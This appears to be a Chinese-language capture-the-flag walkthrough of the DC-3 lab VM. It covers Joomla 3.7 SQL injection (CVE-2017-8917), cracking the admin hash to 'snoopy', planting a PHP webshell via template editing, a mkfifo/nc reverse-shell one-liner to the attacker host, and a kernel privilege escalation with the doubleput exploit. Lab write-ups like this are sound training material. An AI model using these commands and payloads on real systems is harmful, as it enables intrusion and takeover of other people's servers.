DC3-靶机

下载地址

这块填一下坑，上面那个链接有两个下载地址，本人是使用VMware虚拟机，下了第一个ova的导入，使用nmap扫，怎么也扫不到存活主机，一直以为是我本地环境的问题，最后没招了，准备重新下一个试试，然后到下载页面一看，作者已经被反馈过这个问题了，又做了一个新的VMware镜像，可以直接使用。 坑啊！ 所以使用VMware的同学，下载第二个即可。

配置的环境：

kali : 192.168.25.131           DC3 -靶机 和 kali 在同一C段

 

渗透

nmap扫描网段，发现存活主机

nmap -sP 192.168.25.0/24

 

发现主机 192.168.25.133，判定为DC3-靶机，继续使用nmap获取详细信息

nmap -A -p 1-65535 192.168.25.133

 

目标只开放了80端口，访问，发现提示，只有一个入口，让我们提权为root用户

 

继续获取信息，目录扫描，发现administrator目录，访问得到Joomla管理后台，获取其版本号，默认为README.txt，3.7版本

    

 

也可通过kali自带的 joomscan 获取详细信息

joomscan -u http://192.168.25.133

 

google搜索，或kali 搜索得知，Joomla  3.7 版本存在 sql注入漏洞 (CVE-2017-8917)，漏洞细节

searchsploit joomla |grep 3.7

使用 joomblah.py 脚本(python2)利用

 

得到管理员帐户admin，密码已hash加密 ，为了登录admin，我们首先要识别哈希值类型，然后使用hashcat暴力破解。

$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

rockyou.txt

hashcat -m 3200 -a 0 -d 1 --force hash.txt rockyou.txt

 

最后得到密码为 snoopy，成功登陆到后台

 

Joomla后台可编辑模板，修改源码，我们利用这个功能，在template下面创建一个 test.php，写入一句话，蚁剑成功连接

shell 路径 http://192.168.25.133/templates/protostar/test.php  密码 1

  yes

       --->        -   --->  

               

www-data用户，主机Ubuntu 16.04  内核 4.4.0-21，suid提权未发现可利用的，尝试内核提权

 

现在已经拿到一个webshell，我们开始提权，反弹一个shell 到kali上（后台编辑模板时，也可直接写入反弹shell脚本，访问触发)

（shell参考链接）

​​rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.25.131 1234 >/tmp/f

 

kali 搜索 主机Ubuntu 16.04  有关提权漏洞，

searchsploit ubuntu 16.04

 

漏洞细节，下载exp，编译执行

exp，将里面的 exploit.tar 上传，解压运行，运行时会有warning，忽略，因为使用的是拒绝服务漏洞提权，会有点慢，耐心等待

tar -xvf exploit.tar
./compile.sh
./doubleput

     

 

得到 Flag！

 

总结: 还是一如既往的练习工具... 感兴趣的可以去分析下漏洞成因   懒 ：)